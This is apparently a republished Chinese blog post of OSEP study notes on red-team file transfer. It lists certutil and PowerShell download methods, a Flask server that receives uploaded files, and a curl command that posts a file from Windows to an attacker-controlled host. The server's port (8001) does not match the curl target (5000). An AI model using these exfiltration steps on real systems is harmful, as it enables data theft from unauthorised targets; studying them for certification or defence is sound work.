文章总结: 本文是OSEP认证学习笔记第三部分,重点介绍免杀高级技术中的文件传输方法。包括从Kali到Windows的上传技术如certutil、powershellIWR、wget等,以及从Windows到Kali的下载方法,提供了Flask服务器接收文件的Python代码示例和curl命令。这些技术是红队操作中进行文件传输的关键手段,可用于渗透测试中的数据窃取和工具部署。
综合评分: 80
文章分类: 渗透测试,红队,免杀,WEB安全,内网渗透
OSEP | 免杀高级-下
原创
小A法师
高级红队专家
2024年7月29日 07:34
北京
关于笔记形式和学习方法请看OSEP学习之路 | 开篇
本篇是第三部分“免杀高级”技术,主要包括AMSI、uacbypass、applocker以及powershell的CLM模式,笔记基本是按照教材梳理的,章节不是一一对应,因为有些内容合并后更好理解
4-文件传输
4.1-上传:从kali到windows
- certutil - powershell IWR - powershell wget - copy \\\\smbshare\\xxx - curl
4.2-下载:从windows到kali
flask server:
from flask import Flask, requestapp = Flask(__name__)
@app.route("/upload1", methods=["POST"])def save_file1(): data = request.files print("file receiving") print(type(data)) print(data) file = data['file'] print(file.filename) print(request.headers) file.save(file.filename) print("file received") return "done"
@app.route("/upload", methods=["POST"])def save_file(): print("data receiving") data = request.get_data() print("data received") filename = 'data.bin' f = open(filename,'w') f.write(data.decode()) f.close() print("data saved to data.bin") print(data) return "done"
if __name__== '__main__': app.run(host="0.0.0.0", port=8001, debug=True)
curl -F "[email protected]" http://192.168.1.10:5000/upload
坚持自律做最好的自己
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:高级红队专家 小A法师《OSEP | 免杀高级-下》